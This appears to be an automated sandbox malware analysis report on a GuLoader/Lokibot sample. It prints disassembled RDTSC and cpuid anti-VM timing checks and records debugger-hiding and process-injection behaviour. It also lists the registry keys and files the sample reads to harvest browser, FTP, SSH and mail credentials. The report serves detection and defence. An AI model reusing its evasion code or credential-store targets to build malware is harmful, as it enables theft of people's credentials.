Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568F50 second address: 0000000000568F50 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568FB5 second address: 0000000000568FB5 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005646D1 second address: 00000000005646D1 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005649A9 second address: 00000000005649A9 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7BD5F second address: 0000000002A7BD87 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b nop 0x0000000c test eax, D0AB5031h 0x00000011 cmp bx, bx 0x00000014 test bl, 00000003h 0x00000017 cmp dh, FFFFFFFEh 0x0000001a add esi, 00001000h 0x00000020 cmp eax, ebx 0x00000022 pushad 0x00000023 mov edx, 00000093h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A705C5 second address: 0000000002A7BA17 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test dh, bh 0x00000005 add esp, 24h 0x00000008 test dh, ah 0x0000000a cmp dx, A12Ah 0x0000000f call 00007F2994B8FD15h 0x00000014 test dh, ch 0x00000016 call 00007F2994B84FF4h 0x0000001b test dx, 96EDh 0x00000020 test dx, ax 0x00000023 xor edi, edi 0x00000025 test al, bl 0x00000027 mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000031 cmp ch, ah 0x00000033 jmp 00007F2994B84CF2h 0x00000035 test dh, ah 0x00000037 call 00007F2994B84D24h 0x0000003c call 00007F2994B84D1Dh 0x00000041 lfence 0x00000044 mov edx, E38313D7h 0x00000049 sub edx, 2F16C57Fh 0x0000004f xor edx, 80E7F4C8h 0x00000055 xor edx, 4B75BA84h 0x0000005b mov edx, dword ptr [edx] 0x0000005d lfence 0x00000060 jmp 00007F2994B84CF2h 0x00000062 push di 0x00000064 mov di, 99DEh 0x00000068 pop di 0x0000006a cmp ch, dh 0x0000006c test edx, edx 0x0000006e cmp cl, al 0x00000070 cmp ebx, ebx 0x00000072 cmp dl, cl 0x00000074 cmp ax, bx 0x00000077 cmp ch, bh 0x00000079 ret 0x0000007a mov esi, edx 0x0000007c pushad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7B9EF second address: 0000000002A7BB1A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edi, eax 0x00000005 mov eax, dword ptr [ebp+00000175h] 0x0000000b jnl 00007F2994B84C0Ah 0x00000011 test dl, dl 0x00000013 cmp dl, FFFFFFE9h 0x00000016 ret 0x00000017 cmp ebx, ebx 0x00000019 mov dword ptr [ebp+0000009Ch], 00000000h 0x00000023 test eax, eax 0x00000025 mov edi, B28D7814h 0x0000002a test ebx, eax 0x0000002c test ax, bx 0x0000002f xor edi, 94CDCD0Ch 0x00000035 add edi, C10EBF9Eh 0x0000003b test ax, dx 0x0000003e add edi, 18B08B4Ah 0x00000044 mov ecx, F9001DB1h 0x00000049 test edx, edx 0x0000004b test si, 62FDh 0x00000050 xor ecx, B787FB11h 0x00000056 xor ecx, 80F9B81Eh 0x0000005c jmp 00007F2994B84CD2h 0x0000005e test ah, FFFFFF87h 0x00000061 add ecx, 318327E2h 0x00000067 cmp dx, bx 0x0000006a cmp cl, FFFFFFE1h 0x0000006d cmp bh, dh 0x0000006f pushad 0x00000070 mov cx, DA7Eh 0x00000074 cmp cx, DA7Eh 0x00000079 jne 00007F2994B7A0F0h 0x0000007f popad 0x00000080 mov dword ptr [ebp+00000270h], edi 0x00000086 mov edi, ecx 0x00000088 push edi 0x00000089 cmp eax, eax 0x0000008b mov edi, dword ptr [ebp+00000270h] 0x00000091 cmp al, bl 0x00000093 cmp al, dl 0x00000095 test dh, dh 0x00000097 call 00007F2994B84E77h 0x0000009c call 00007F2994B84F00h 0x000000a1 lfence 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7BB1A second address: 0000000002A7BB1A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F88CF074h 0x00000013 sub eax, F33A243Ch 0x00000018 add eax, C091F0E2h 0x0000001d sub eax, C5E4BD19h 0x00000022 cpuid 0x00000024 cmp bx, ax 0x00000027 bt ecx, 1Fh 0x0000002b test ecx, eax 0x0000002d jc 00007F2994B856CDh 0x00000033 popad 0x00000034 cmp cl, al 0x00000036 call 00007F2994B84EF0h 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7C96F second address: 0000000002A7C96F instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A708F9 second address: 0000000002A708F9 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A71C4A second address: 0000000002A71C4A instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77AC4 second address: 0000000002A77AC4 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7A4FA second address: 0000000002A7A4FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp byte ptr [eax], cl 0x00000005 mov ecx, dword ptr [ebp+00000252h] 0x0000000b jne 00007F2994B84B20h 0x00000011 jmp 00007F2994B84CD2h 0x00000013 cmp cx, 0F8Fh 0x00000018 mov dl, byte ptr [eax] 0x0000001a jmp 00007F2994B84CD2h 0x0000001c cmp ah, dh 0x0000001e mov byte ptr [ebx], dl 0x00000020 jmp 00007F2994B84CD2h 0x00000022 test dh, bh 0x00000024 add eax, 02h 0x00000027 add ebx, 02h 0x0000002a add ecx, 02h 0x0000002d mov dword ptr [ebp+00000252h], ecx 0x00000033 mov ecx, E089AE1Eh 0x00000038 jmp 00007F2994B84CD2h 0x0000003a cmp edi, 4C2B4D6Ch 0x00000040 xor ecx, 43CBDC15h 0x00000046 jmp 00007F2994B84CD6h 0x00000048 test bh, FFFFFFABh 0x0000004b xor ecx, 65B5FDABh 0x00000051 jmp 00007F2994B84CD2h 0x00000053 test cx, cx 0x00000056 add ecx, 39087060h 0x0000005c pushad 0x0000005d mov ecx, 000000D7h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76A8A second address: 0000000002A76B31 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor esi, 58A792A8h 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 xor esi, 318B51C7h 0x0000001a add esi, 2B3F7621h 0x00000020 test dx, ax 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+00000206h] 0x0000002a test dl, cl 0x0000002c mov dword ptr [ebp+00000240h], eax 0x00000032 test ah, FFFFFFD5h 0x00000035 mov eax, 808116E1h 0x0000003a cmp bx, AA3Fh 0x0000003f xor eax, 669D47CFh 0x00000044 jmp 00007F2994B84CF2h 0x00000046 cmp ebx, ecx 0x00000048 add eax, 0060AF4Eh 0x0000004d cmp cl, dl 0x0000004f sub eax, E67D007Bh 0x00000054 test dh, 00000000h 0x00000057 cmp edi, 60808D3Eh 0x0000005d push eax 0x0000005e mov eax, dword ptr [ebp+00000240h] 0x00000064 test esi, F9C4EDE0h 0x0000006a sub edi, 20h 0x0000006d mov dword ptr [ebp+00000202h], ebx 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76B31 second address: 0000000002A76BDC instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+00000202h] 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 add edi, 20h 0x00000017 mov dword ptr [ebp+0000023Eh], ecx 0x0000001d mov ecx, edi 0x0000001f push ecx 0x00000020 test dx, ax 0x00000023 mov ecx, dword ptr [ebp+0000023Eh] 0x00000029 test dl, cl 0x0000002b mov dword ptr [ebp+0000023Bh], ecx 0x00000031 mov ecx, 005F6649h 0x00000036 test ah, 00000036h 0x00000039 sub ecx, 2C1083A2h 0x0000003f cmp bx, AC4Fh 0x00000044 xor ecx, A25F7B13h 0x0000004a test ah, ch 0x0000004c sub ecx, 761199B3h 0x00000052 jmp 00007F2994B84CD6h 0x00000054 test bl, al 0x00000056 push ecx 0x00000057 cmp ecx, F5C42B54h 0x0000005d mov ecx, dword ptr [ebp+0000023Bh] 0x00000063 test al, bl 0x00000065 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000006f mov eax, ebp 0x00000071 add eax, 0000010Ch 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76BDC second address: 0000000002A76C00 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001F8h], esi 0x00000010 cmp dl, al 0x00000012 mov esi, eax 0x00000014 push esi 0x00000015 test dl, al 0x00000017 mov esi, dword ptr [ebp+000001F8h] 0x0000001d cmp dx, ax 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76E37 second address: 0000000002A76EFD instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dx 0x00000005 mov dx, 4B4Eh 0x00000009 pop dx 0x0000000b mov edi, dword ptr [ebp+20h] 0x0000000e mov dword ptr [ebp+0000024Ah], eax 0x00000014 pushad 0x00000015 mov di, FB19h 0x00000019 cmp di, FB19h 0x0000001e jne 00007F2994B88999h 0x00000024 popad 0x00000025 mov eax, 55010C71h 0x0000002a xor eax, 7B0C9DC0h 0x0000002f jmp 00007F2994B84CD2h 0x00000031 fnop 0x00000033 test edx, ecx 0x00000035 add eax, F2EE5946h 0x0000003a sub eax, 20FBEAF3h 0x0000003f cmp al, 2Dh 0x00000041 push eax 0x00000042 mov eax, dword ptr [ebp+0000024Ah] 0x00000048 cmp dx, bx 0x0000004b mov dword ptr [ebp+000001AEh], edi 0x00000051 mov edi, B416B738h 0x00000056 cmp ah, FFFFFFBAh 0x00000059 xor edi, 22E1EBC2h 0x0000005f test bl, 00000039h 0x00000062 xor edi, 2BD601D6h 0x00000068 test ebx, A774BCF7h 0x0000006e cmp ebx, ecx 0x00000070 xor edi, BD215D2Ch 0x00000076 cmp cx, bx 0x00000079 cmp edx, 9A89F087h 0x0000007f test cl, bl 0x00000081 push edi 0x00000082 test dx, ax 0x00000085 mov edi, dword ptr [ebp+000001AEh] 0x0000008b push 92F9677Ch 0x00000090 test eax, ecx 0x00000092 pushad 0x00000093 lfence 0x00000096 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77665 second address: 0000000002A77665 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056BD5F second address: 000000000056BD87 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b nop 0x0000000c test eax, D0AB5031h 0x00000011 cmp bx, bx 0x00000014 test bl, 00000003h 0x00000017 cmp dh, FFFFFFFEh 0x0000001a add esi, 00001000h 0x00000020 cmp eax, ebx 0x00000022 pushad 0x00000023 mov edx, 00000093h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005605C5 second address: 000000000056BA17 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test dh, bh 0x00000005 add esp, 24h 0x00000008 test dh, ah 0x0000000a cmp dx, A12Ah 0x0000000f call 00007F2994B8FD15h 0x00000014 test dh, ch 0x00000016 call 00007F2994B84FF4h 0x0000001b test dx, 96EDh 0x00000020 test dx, ax 0x00000023 xor edi, edi 0x00000025 test al, bl 0x00000027 mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000031 cmp ch, ah 0x00000033 jmp 00007F2994B84CF2h 0x00000035 test dh, ah 0x00000037 call 00007F2994B84D24h 0x0000003c call 00007F2994B84D1Dh 0x00000041 lfence 0x00000044 mov edx, E38313D7h 0x00000049 sub edx, 2F16C57Fh 0x0000004f xor edx, 80E7F4C8h 0x00000055 xor edx, 4B75BA84h 0x0000005b mov edx, dword ptr [edx] 0x0000005d lfence 0x00000060 jmp 00007F2994B84CF2h 0x00000062 push di 0x00000064 mov di, 99DEh 0x00000068 pop di 0x0000006a cmp ch, dh 0x0000006c test edx, edx 0x0000006e cmp cl, al 0x00000070 cmp ebx, ebx 0x00000072 cmp dl, cl 0x00000074 cmp ax, bx 0x00000077 cmp ch, bh 0x00000079 ret 0x0000007a mov esi, edx 0x0000007c pushad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056B9EF second address: 000000000056BB1A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edi, eax 0x00000005 mov eax, dword ptr [ebp+00000175h] 0x0000000b jnl 00007F2994B84C0Ah 0x00000011 test dl, dl 0x00000013 cmp dl, FFFFFFE9h 0x00000016 ret 0x00000017 cmp ebx, ebx 0x00000019 mov dword ptr [ebp+0000009Ch], 00000000h 0x00000023 test eax, eax 0x00000025 mov edi, B28D7814h 0x0000002a test ebx, eax 0x0000002c test ax, bx 0x0000002f xor edi, 94CDCD0Ch 0x00000035 add edi, C10EBF9Eh 0x0000003b test ax, dx 0x0000003e add edi, 18B08B4Ah 0x00000044 mov ecx, F9001DB1h 0x00000049 test edx, edx 0x0000004b test si, 62FDh 0x00000050 xor ecx, B787FB11h 0x00000056 xor ecx, 80F9B81Eh 0x0000005c jmp 00007F2994B84CD2h 0x0000005e test ah, FFFFFF87h 0x00000061 add ecx, 318327E2h 0x00000067 cmp dx, bx 0x0000006a cmp cl, FFFFFFE1h 0x0000006d cmp bh, dh 0x0000006f pushad 0x00000070 mov cx, DA7Eh 0x00000074 cmp cx, DA7Eh 0x00000079 jne 00007F2994B7A0F0h 0x0000007f popad 0x00000080 mov dword ptr [ebp+00000270h], edi 0x00000086 mov edi, ecx 0x00000088 push edi 0x00000089 cmp eax, eax 0x0000008b mov edi, dword ptr [ebp+00000270h] 0x00000091 cmp al, bl 0x00000093 cmp al, dl 0x00000095 test dh, dh 0x00000097 call 00007F2994B84E77h 0x0000009c call 00007F2994B84F00h 0x000000a1 lfence 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 000000000056BB1A second address: 000000000056BB1A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F88CF074h 0x00000013 sub eax, F33A243Ch 0x00000018 add eax, C091F0E2h 0x0000001d sub eax, C5E4BD19h 0x00000022 cpuid 0x00000024 cmp bx, ax 0x00000027 bt ecx, 1Fh 0x0000002b test ecx, eax 0x0000002d jc 00007F2994B856CDh 0x00000033 popad 0x00000034 cmp cl, al 0x00000036 call 00007F2994B84EF0h 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568F50 second address: 0000000000568F50 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000000568FB5 second address: 0000000000568FB5 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005646D1 second address: 00000000005646D1 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 00000000005649A9 second address: 00000000005649A9 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7423B rdtsc

0_2_02A7423B

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

API coverage: 6.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852	Thread sleep count: 160 > 30			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe TID: 1852	Thread sleep time: -9600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: 8rbuJ8Ycv1.exe, 00000000.00000002.887799869.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7423B rdtsc

0_2_02A7423B

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A78888 LdrInitializeThunk,

0_2_02A78888

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B mov eax, dword ptr fs:[00000030h]	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE mov eax, dword ptr fs:[00000030h]	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7AAF6 mov eax, dword ptr fs:[00000030h]	0_2_02A7AAF6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75347 mov eax, dword ptr fs:[00000030h]	0_2_02A75347
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74E3A mov eax, dword ptr fs:[00000030h]	0_2_02A74E3A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C70C mov eax, dword ptr fs:[00000030h]	0_2_02A7C70C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77C8A mov eax, dword ptr fs:[00000030h]	0_2_02A77C8A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B46E mov eax, dword ptr fs:[00000030h]	0_2_02A7B46E

Enables debug privileges

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'

Jump to behavior

Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1728919012.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Code function: 0_2_02A7E6B0 cpuid

0_2_02A7E6B0

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality:

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

ID:	451510
Product:	CloudBasic
Start time:	18:32:00
Start date:	20.07.2021
Sample:	8rbuJ8Ycv1.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	546f9c26cb739f1e3ea5ba1605aa7328
SHA1:	452ee936bbade0510c6c56d6e2b25f6ce7b835ff
SHA256:	6bd6a8e685288ca0af1d41d4d88fabd465f211c7cef32c00c994b89ea0a94f51
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a	data	382F1DF2F660B7B9CF98E7196150131D	09F1A46D6E00EE383BB2C097982DFAAB294C9A91	2F7A4EB52AD3759BF4B96F3A4C0B267AE9A07F1E6E293CFBF699B3626A8F6A7C

Windows Analysis Report 8rbuJ8Ycv1.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs